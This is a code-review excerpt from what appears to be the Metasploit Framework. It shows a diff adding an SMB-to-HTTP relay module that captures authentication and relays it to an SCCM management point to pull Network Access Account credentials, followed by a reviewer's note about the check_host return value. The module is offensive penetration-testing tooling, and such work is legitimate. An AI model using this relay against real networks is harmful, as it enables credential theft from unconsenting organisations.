modules/auxiliary/server/relay/relay_get_naa_credentials.rb

```diff
@@ -0,0 +1,102 @@
+  include ::Msf::Exploit::Remote::HTTP::SCCM
+
+  def initialize
+    super({
+      'Name' => 'SMB to HTTP relay version of Get NAA Creds',
+      'Description' => %q{
+              This module creates an SMB server and then relays the credentials passed to it to SCCM's HTTP server
+              (aka Management Point) to gain an authenticated connection. Once authenticated it then attempts to retrieve
+              the Network Access Account(s), if configured, from the SCCM server. This requires a computer account,
+              which can be added using the samr_account module.
+
+              If you have domain credentials but are unsure of the either the MANAGEMENT_POINT or SITE_CODE for the
+              SCCM server, the original (non-relay) version of this module has an auto discovery feature which will use
+              domain credentials to run an LDAP query to find both the MANAGEMENT_POINT and the SITE_CODE.
+            },
+      'Author' => [
+        'xpn', # Initial research
+        'skelsec', # Initial obfuscation port
+        'smashery', # original module author
+        'jheysel-r7' # added relay capability
+      ],
+      'References' => [
+        ['URL', 'https://blog.xpnsec.com/unobfuscating-network-access-accounts/'],
+        ['URL', 'https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/CRED/CRED-2/cred-2_description.md'],
+        ['URL', 'https://github.com/Mayyhem/SharpSCCM'],
+        ['URL', 'https://github.com/garrettfoster13/sccmhunter']
+      ],
+      'DefaultOptions' => {
+        'RPORT' => 80
+      },
+      'License' => MSF_LICENSE,
+      'Actions' => [[ 'Relay', { 'Description' => 'Run SMB SCCM relay server' } ]],
+      'PassiveActions' => [ 'Relay' ],
+      'DefaultAction' => 'Relay'
+    })
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'The URI for the cert server.', '/' ]),
+        OptBool.new('RANDOMIZE_TARGETS', [true, 'Whether the relay targets should be randomized', true]),
+        OptString.new('MANAGEMENT_POINT', [ true, 'The management point (SCCM server) to use' ]),
+        OptString.new('SITE_CODE', [ true, 'The site code to use on the management point' ]),
+        OptInt.new('TIMEOUT', [ true, 'Number of seconds to wait for SCCM DB to update', 10 ])
+      ]
+    )
+  end
+
+  def relay_targets
+    Msf::Exploit::Remote::SMB::Relay::TargetList.new(
+      (datastore['SSL'] ? :https : :http),
+      datastore['RPORT'],
+      datastore['RELAY_TARGETS'],
+      '/ccm_system_windowsauth/request',
+      randomize_targets: datastore['RANDOMIZE_TARGETS']
+    )
+  end
+
+  def check_host(target_ip)
+    res = send_request_raw(
+      {
+        'rhost' => target_ip,
+        'method' => 'GET',
+        'uri' => normalize_uri('/ccm_system_windowsauth/request'),
+        'headers' => {
+          'Accept-Encoding' => 'identity'
+        }
+      }
+    )
+    disconnect
+
+    res&.code == 401
+  end
```

Comment:
Since #19639 was landed we can have checks in relay modules. The `#check_host` method should actually be returning a status code.

It can't be used with the `AutoCheck` mixin, but you should be able to update the beginning of your `#run` method to still call it. That's also what the [ESC8 module is doing.](https://github.com/rapid7/metasploit-framework/blob/2e842179b7b3e66cb12ac3f835bc76b5af5bdca8/modules/auxiliary/server/relay/esc8.rb#L102-L108)